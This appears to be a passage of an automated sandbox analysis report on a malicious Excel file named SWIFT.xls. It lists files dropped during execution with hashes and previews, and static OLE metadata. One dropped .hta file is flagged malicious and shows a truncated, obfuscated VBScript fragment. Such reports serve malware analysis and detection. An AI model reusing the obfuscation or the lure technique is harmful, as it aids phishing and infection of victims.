                                          SSDEEP:6144:/d1ps74Ml+uTtCs8J0E4MxyuGOE68J0Znm:W1ltcs00E1x8h600g
                                          MD5:C4F5DD2AB888301D6BC4ED2796FEF74B
                                          SHA1:76F0DE990928986AC44A28C195DAEDAECA1B6268
                                          SHA-256:230FDFFE75C0ECBE6087A83F09275CCEC194C9ECB626A4D242FE33852AD0BEF7
                                          SHA-512:7541B330785EB5AB48B9BC59336D0B5F6327FD610762E29AB2F746E97DD24B981FC12DC78689590A284E1563B4F9FBD98531FDA3D0D8430C0E20F32404B16D40
                                          Malicious:false
                                          Preview:....l...............J................M.. EMF......$.B#..'.......................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............F...............6...!..............?...........?................................'.......................%...........(.......................L...

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KA259YPD\mniscreenthinkinggoodforentiretimegoodfotbusubessthings[1].hta

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:HTML document, ASCII text, with very long lines (8772), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):8898
                                          Entropy (8bit):2.899633905074514
                                          Encrypted:false
                                          SSDEEP:48:3EsYcJaFxYcJeMilzHIM7py4U2b6poz10daCa/b9:0LfgtlzF82bPpT9
                                          MD5:0D80023F01F54FA272B5E479939931D2
                                          SHA1:51E7B1B40CCCF70D60824AC128FC5AB64BB6A2F2
                                          SHA-256:5DAD7712C6DBDF9E9931941ABE2E02A0C8DCBE93802CD317CE96A2D95D4DC653
                                          SHA-512:73FB549F3485CF4E7856E2A326283D9199462026ED918F445EAF9EACEDCA101988598DB54134D379486D23831801AC0554252CE3D6B359C75CB1F672945948DD
                                          Malicious:true
                                          Preview:<!DOCTYPE html>..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >..<html>..<body>..<SCRIpT tyPe="tEXT/VbScrIpt">..DIm.....................................................................................................................................................................................................................................TUzkrgqBknbtbVQXNIcXRvgdMbxOKmWpBOuVZPzxfxOfXSarEhOplYnjMcthreajAWMAlWBavFUYJDgljBcoVTGVgjlVafReLGKBypgjeaBBHRRHyfZxqVSpPJjGgddadhwAgJUbZXRonwNFshOsRSEt.....................................................................................................................................................................................................................................,.....................................................................................................................................................................................................................................XcGKIdpOALZNyrWVtLJpFgBRXseCYmd

                                          C:\Users\user\AppData\Local\Temp\20ED6DAB.tmp

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1584
                                          Entropy (8bit):2.6928361216532144
                                          Encrypted:false
                                          SSDEEP:24:YxIPuk+z7Fl3HyFOqYp2IyoeyjkFP5VQBMQRgYOCE+E7UXOKI5KazYvKISmtzGd2:YxAT+PFKUFM78BMQiYOSVIADK+GTzq
                                          MD5:CE32F70E720ADCBCA3832170077678F5
                                          SHA1:DBC905854C8C46BA08DFE3CB040A644C06E76F8D
                                          SHA-256:DC3B4A2D32EEB0B387AD67EE71194B61AB60818C633DF870DA89F5485D26FACE
                                          SHA-512:48BC3D3AF66EBA0CBA9941D3D8AA1E4360683DE7EDFB8489EACACA9052CF717136EA7CC6B9E58958B454D265C1A011865421BA818D461A15BFD17453DD14C2F0
                                          Malicious:false
                                          Preview:3.7.4.6.3.7.8.,.3.7.4.6.3.7.6.,.1.0.7.,.6.3.6.4.3.3.4.,.1.1.9.6.3.7.8.,.2.5.5.0.5.0.8.8.,.1.0.1.,.1.0.4.9.5.2.3.4.,.1.1.9.,.7.0.0.9.9.8.4.,.1.1.9.6.2.9.3.,.1.2.4.,.1.9.8.4.4.3.5.,.6.3.6.4.3.3.1.,.1.5.6.1.9.5.8.,.6.5.4.2.1.8.5.1.,.1.2.5.,.6.3.6.4.3.3.2.,.1.2.8.,.1.0.0.,.1.0.3.,.1.0.4.,.1.0.5.,.1.0.6.,.1.0.8.,.1.0.9.,.1.1.2.,.1.1.4.,.1.1.8.,.1.2.0.,.3.0.0.4.9.2.6.8.,.1.2.1.,.1.2.2.,.5.4.5.6.5.4.3.,.1.2.3.,.1.2.6.,.1.2.2.3.4.3.4.,.4.5.8.4.0.2.3.2.,.2.6.0.1.,.8.7.4.7.0.1.5.3.,.3.7.4.6.2.5.9.,.3.7.4.6.2.6.5.,.3.7.4.6.2.5.8.,.;.9.,.6.1.7.0.7.3.0.5.,.3.,.3.0.1.5.3.7.2.1.,.4.0.6.9.3.5.8.2.,.2.3.7.1.6.5.1.,.6.3.6.4.3.3.7.,.2.7.3.6.0.0.9.5.,.2.6.4.8.5.7.8.4.,.6.1.7.0.7.3.0.7.,.3.3.7.9.1.6.2.,.3.2.9.4.5.8.7.9.9.,.2.4.6.0.9.2.5.8.,.1.3.5.2.5.8.6.,.5.7.9.9.9.6.6.1.,.4.8.1.9.5.5.3.8.,.7.4.5.3.4.5.9.,.2.7.1.5.3.4.9.7.,.3.7.4.6.3.7.9.,.6.3.7.1.6.9.4.,.1.3.,.3.0.1.2.3.4.6.6.,.3.4.1.4.8.5.6.8.,.6.5.4.0.2.1.5.,.5.8.4.2.5.8.6.0.,.6.3.0.6.3.0.9.9.,.4.,.5.9.2.2.3.4.3.7.,.1.0.6.9.5.5.2.,.5.2.9.1.0.0.0.2.,.1.

                                          C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\Additional\Additional1734704851382297600_333D789C-712C-4FA7-9D95-BDF17FB34A92.log

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):20971520
                                          Entropy (8bit):8.112143835430977E-5
                                          Encrypted:false
                                          SSDEEP:3:Tuekk9NJtHFfs1XsExe/t:qeVJ8
                                          MD5:AFDEAC461EEC32D754D8E6017E845D21
                                          SHA1:5D0874C19B70638A0737696AEEE55BFCC80D7ED8
                                          SHA-256:3A96B02F6A09F6A6FAC2A44A5842FF9AEB17EB4D633E48ABF6ADDF6FB447C7E2
                                          SHA-512:CAB6B8F9FFDBD80210F42219BAC8F1124D6C0B6995C5128995F7F48CED8EF0F2159EA06A2CD09B1FDCD409719F94A7DB437C708D3B1FDA01FDC80141A4595FC7
                                          Malicious:false
                                          Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\Additional\Additional1734704851382983700_333D789C-712C-4FA7-9D95-BDF17FB34A92.log

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):20971520
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3::
                                          MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                          SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                          SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                          SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                          Malicious:false
                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\Additional\Additional1734704940455088000_DE1C439D-013A-4BF1-AB94-B04426C5F936.log

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):71
                                          Entropy (8bit):4.3462513114457515
                                          Encrypted:false
                                          SSDEEP:3:Tuekk9NJtHFfs1XsExen:qeVJ8u
                                          MD5:8F4510F128F81A8BAF2A345D00F7E30C
                                          SHA1:8C711E6C484881ECDC83B6BDAC41C7A19EDE9C37
                                          SHA-256:15AA8B35FC5F139EF0B0FBC641CAA862AED19674625B81D1DC63467BC0AAFED9
                                          SHA-512:78695E5E2337703757903B8452E31A98F860022B04972651212C3004FEBE29017380A8BCA9FCCFD935DE00D8BD73AA556C30A3CEA5FC76E7ADF7E7763D68E78F
                                          Malicious:false
                                          Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..

                                          C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\Primary1734704851380286400_333D789C-712C-4FA7-9D95-BDF17FB34A92.log

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:ASCII text, with very long lines (28576), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):20971520
                                          Entropy (8bit):0.22755382601635413
                                          Encrypted:false
                                          SSDEEP:1536:pkxo7ZoBKbezoJ0+lkQ0jDh4YGzSJEtXJlmvsAIUnTOuoiKtvlJbDk0T+G2cWgED:moxSoJFkQdrSUIDHtA9/FLYgItV
                                          MD5:489731CC94DEB92D359515F1205412AC
                                          SHA1:5571AA28A3EEA9F4FAF59BE1622C06D3048E6AA2
                                          SHA-256:B6C73D185A6DE7CAC8FD65B4A7F460EF6228E48734A422E65C22548BF0083BDB
                                          SHA-512:86FE2F6564BAE67F9DCD2DEC0CFF1347E3C92B6BA9EA082FB116AD39CCCE8FA3569AAD5EB74D32A05B062A76EBD56C72AEB59F07F26CAFA4500A184A1C184CC0
                                          Malicious:false
                                          Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/20/2024 14:27:31.394.EXCEL (0xDA0).0x8DC.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":17,"Time":"2024-12-20T14:27:31.394Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-20T14:27:31.0815727Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-20T14:27:31.0815727Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-20T14:27:31.0815727Z\", \"C\" : \"\", \"Q\" : 7.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \"N\

                                          C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\Primary1734704851380859300_333D789C-712C-4FA7-9D95-BDF17FB34A92.log

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):20971520
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3::
                                          MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                          SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                          SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                          SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                          Malicious:false
                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\Primary1734704940453335400_DE1C439D-013A-4BF1-AB94-B04426C5F936.log

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:ASCII text, with very long lines (28734), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):323012
                                          Entropy (8bit):5.115653201816774
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5E56FF54A6E653DB660703C9BB5A7873
                                          SHA1:060F12E469ECA53B6F7FCCA2A39B3809F40160F2
                                          SHA-256:FD05CA3BBCCA731CED004328170EAEB3949CED53BB802577307B18FC01CD923F
                                          SHA-512:273D2F0220F38F8F11B2AA1CD971834EE2054478306C3B47109E4133DC5BEA45D9EE935FED7EEA3CA76B752DF7ACBACB8D05A9ACC74D7F41E9801ED6EB14E7C7
                                          Malicious:false
                                          Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/20/2024 14:29:00.486.EXCEL (0x22E8).0x232C.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":17,"Time":"2024-12-20T14:29:00.486Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-20T14:29:00.1579804Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-20T14:29:00.1579804Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-20T14:29:00.1579804Z\", \"C\" : \"\", \"Q\" : 6.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \"

                                          C:\Users\user\AppData\Local\Temp\MSI2b161.LOG

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):246
                                          Entropy (8bit):3.5217358039039093
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:C496C93354353A8351E43C6431B48562
                                          SHA1:980004812CE9F39241434BDEAB973FCDA4F71AF1
                                          SHA-256:7C139355ADCA338C6359A969EC994FAFBFE65E1C46EBCDEA4D32EFADFB5CDE8F
                                          SHA-512:FB8BB7A2A5BD2087811458A65DB5BA029E80EDA23F62B8E0F2FD858A5C183FC75383442AC810558174EBA564CB40185DB0CFCC0D33162E230BBC787F02DB9040
                                          Malicious:false
                                          Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.0./.1.2./.2.0.2.4. . .0.9.:.2.8.:.5.8. .=.=.=.....

                                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\A9otjxx5_1wrr77x_68s.tmp

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3114112
                                          Entropy (8bit):2.150395766624096
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:CB8D4DE658565C79B49E485631D057DF
                                          SHA1:0975C5C94963B057D15CC039CC4014568ADD2068
                                          SHA-256:724A2A2A1A175DAA6F78D60B6CCB8D3ED9430744899ED780189B40C16BAB1A0D
                                          SHA-512:E8FBE9B35D7A2AECF46D75790674B9A245DED3CA7C2D18C56EEBC9058FEACDC3605B2294575D4D993BB9A1DBBCCB104DBA51DB9CCD51439F43CBB68DBA1F48BA
                                          Malicious:false
                                          Preview:............................................................................................................................................................................................................................................................................................................t...........................................................................................^......._.......c.......d...........................................................................................................................................-...)...A12_acrobat_multiFile_generic_dark_32.pdf...................................................................................................8...........................................................................................................%...!...A12_acrobat_parcel_generic_64.pdf...........................................................................................................9.......................................

                                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader124.4.20272.6.log

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):36046
                                          Entropy (8bit):5.338672638424124
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:1D8F24FE6AA6D2778FC21C89AD0355DC
                                          SHA1:9C8B5A37529C1CB76215625BA18C5CAF9023FD48
                                          SHA-256:95045F81BBBF9102CD1EB23F9D42152A0637FE138EDB71416F9075AC79790482
                                          SHA-512:E3121F06E47ECCA7A804EA338A4A95461009845C17A7A80596C3AA0090028F3629C5FA112DD246E312E6ACE7430F4805DBC04F6096DF92C2DE103984689E1E41
                                          Malicious:false
                                          Preview:SessionID=2302ef24-ce46-47ed-98f5-81936d4364f1.1734704929074 Timestamp=2024-12-20T09:28:49:075-0500 ThreadID=4420 Component=ngl-lib_NglAppLib Description="InitializeLogger: -------- Initializing session logs --------"..SessionID=2302ef24-ce46-47ed-98f5-81936d4364f1.1734704929074 Timestamp=2024-12-20T09:28:49:078-0500 ThreadID=4420 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=2302ef24-ce46-47ed-98f5-81936d4364f1.1734704929074 Timestamp=2024-12-20T09:28:49:079-0500 ThreadID=4420 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=2302ef24-ce46-47ed-98f5-81936d4364f1.1734704929074 Timestamp=2024-12-20T09:28:49:081-0500 ThreadID=4420 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.22631.1"..SessionID=2302ef24-ce46-47ed-98f5-81936d4364f1.1734704929074 Timestamp=2024-12-20T09:28:49:084-0500 ThreadID=4420 Component=ngl-lib_NglAppLib De

                                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):13106
                                          Entropy (8bit):5.405425117411632
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:70ACC5603FE493C603C12728A9F73FEA
                                          SHA1:EDF48B2BB6E30B3B22D3F5B7C8CFB3745A1DBFF0
                                          SHA-256:E47B9DA8553F7DC3149DC38480F5C2B71FDADD357F769CFBE559A5AF31600DF2
                                          SHA-512:EE3CEB4401D846C679444378DE1507EBDDC005958E951BEC57C663B7AF8B67A4CBBED51B03194C07019D3BFA5BE5697DF289DA359CE491DFBDDDD65DD91A05B8
                                          Malicious:false
                                          Preview:09-12-2024 07:34:53:.---2---..09-12-2024 07:34:53:.AcroNGL Integ ADC-4240758 : ***************************************..09-12-2024 07:34:53:.AcroNGL Integ ADC-4240758 : ***************************************..09-12-2024 07:34:53:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..09-12-2024 07:34:53:.AcroNGL Integ ADC-4240758 : Starting NGL..09-12-2024 07:34:53:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...09-12-2024 07:34:53:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..09-12-2024 07:34:53:.AcroNGL Integ ADC-4240758 : NGLAppVersion 24.4.20220.6..09-12-2024 07:34:53:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..09-12-2024 07:34:54:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..09-12-2024 07:34:54:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..09-12-2024 07:34:54:.Closing File..09-12-

                                          C:\Users\user\AppData\Local\Temp\~DF33816C7874DDB43F.TMP

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):512
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                          Malicious:false
                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\~DF8130EB1744C96FD6.TMP

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):512
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                          Malicious:false
                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\~DFDFC96217E36E1C6E.TMP

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):364544
                                          Entropy (8bit):5.45467846527136
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:3A43540E18B108AFEFB66FFCCF5390C2
                                          SHA1:34B682679F9AB3C7F886BCDC7BFF7DA4A3C23D57
                                          SHA-256:442E169A662DF29FBD40A7908DF971F1C433AA4B2F184CFB4CCA7DD833BD8B97
                                          SHA-512:13D2E046A61F92C9FE88A02FC0706376DFD56980F86E10619033CDFBF51CB034FBC0AB43D5EDEA17547D80783E3982351692E7C77F8CDDD3092A80BAF7B82007
                                          Malicious:false
                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\Desktop\06331000

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Dec 20 14:28:57 2024, Security: 1
                                          Category:dropped
                                          Size (bytes):695296
                                          Entropy (8bit):7.776987736200374
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:1AF7D6612A943E0F9A76AF006195B90E
                                          SHA1:72BA54D5E53F00E5CA2F46D6F5FCE85E68D2381C
                                          SHA-256:7C75CD5D2C91A245397F58A0AE57B4C46A521D3839B848CB2D96E7E3742FE8F5
                                          SHA-512:3BEDC38285009D495A027A84C6A00368D11DCB3E9AF1AA990B03D00AA76FFCC8DA49C51C7AA609DC98487F1FCF3E7AA34BF7D387B8AC51E05BC2A3BE32F69283
                                          Malicious:false
                                          Preview:......................>...............................................................................h.......j........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                          C:\Users\user\Desktop\06331000:Zone.Identifier

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:false
                                          Preview:[ZoneTransfer]....ZoneId=0

                                          C:\Users\user\Desktop\SWIFT.xls (copy)

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Dec 20 14:28:57 2024, Security: 1
                                          Category:dropped
                                          Size (bytes):695296
                                          Entropy (8bit):7.776987736200374
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:1AF7D6612A943E0F9A76AF006195B90E
                                          SHA1:72BA54D5E53F00E5CA2F46D6F5FCE85E68D2381C
                                          SHA-256:7C75CD5D2C91A245397F58A0AE57B4C46A521D3839B848CB2D96E7E3742FE8F5
                                          SHA-512:3BEDC38285009D495A027A84C6A00368D11DCB3E9AF1AA990B03D00AA76FFCC8DA49C51C7AA609DC98487F1FCF3E7AA34BF7D387B8AC51E05BC2A3BE32F69283
                                          Malicious:true
                                          Preview:......................>...............................................................................h.......j........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                          Static File Info

                                          General

                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Dec 20 10:40:27 2024, Security: 1
                                          Entropy (8bit):7.781464205116081
                                          TrID:
                                          • Microsoft Excel sheet (30009/1) 47.99%
                                          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                          File name:SWIFT.xls
                                          File size:699'392 bytes
                                          MD5:ed7928a72e06e8122d90ae9eb43736d6
                                          SHA1:784a817af018202ee02bad8760c85b996942a38b
                                          SHA256:e5d3f77e814bb0dfe7773205bf105a2b9d08f6f0245b7c1808e1c72748e180e9
                                          SHA512:7cbd2c5cda4c2fa86a4a6c77b90172582ff35dea7a724d2fdb1bfd4d9213372c3fb53a2b6e3886d4346fe48fe7ac45774f79e94462f3e98f5d9018ffa84f6653
                                          SSDEEP:12288:TsMo+aBfwVmefX0ygphV4Bzvwq6LGMxIH7KbpNE473f9tR8IO0mvg99Gr+3nKcA:IM2bphV4dH6LDIH7KJry/G9kKz
                                          TLSH:EDE40222F6C9DE47E856173553A322435B33BC6A5F634A0B6354732A3EB36C0C913A67
                                          File Content Preview:........................>...............................................................................a.......c..............................................................................................................................................

                                          File Icon

                                          Icon Hash:35ed8e920e8c81b5

                                          Static OLE Info

                                          General

                                          Document Type:OLE
                                          Number of OLE Files:1

                                          OLE File "SWIFT.xls"

                                          Indicators
                                          Has Summary Info:
                                          Application Name:Microsoft Excel
                                          Encrypted Document:True
                                          Contains Word Document Stream:False
                                          Contains Workbook/Book Stream:True
                                          Contains PowerPoint Document Stream:False
                                          Contains Visio Document Stream:False
                                          Contains ObjectPool Stream:False
                                          Flash Objects Count:0
                                          Contains VBA Macros:False
                                          Summary
                                          Code Page:1252
                                          Author:
                                          Last Saved By:
                                          Create Time:2006-09-16 00:00:00
                                          Last Saved Time:2024-12-20 10:40:27
                                          Creating Application:Microsoft Excel
                                          Security:1
                                          Document Summary
                                          Document Code Page:1252
                                          Thumbnail Scaling Desired:False
                                          Contains Dirty Links:False
                                          Shared Document:False
                                          Changed Hyperlinks:False
                                          Application Version:786432

                                          Streams

                                          Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                          General
                                          Stream Path:\x1CompObj
                                          CLSID:
                                          File Type:data
                                          Stream Size:114
                                          Entropy:4.25248375192737
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
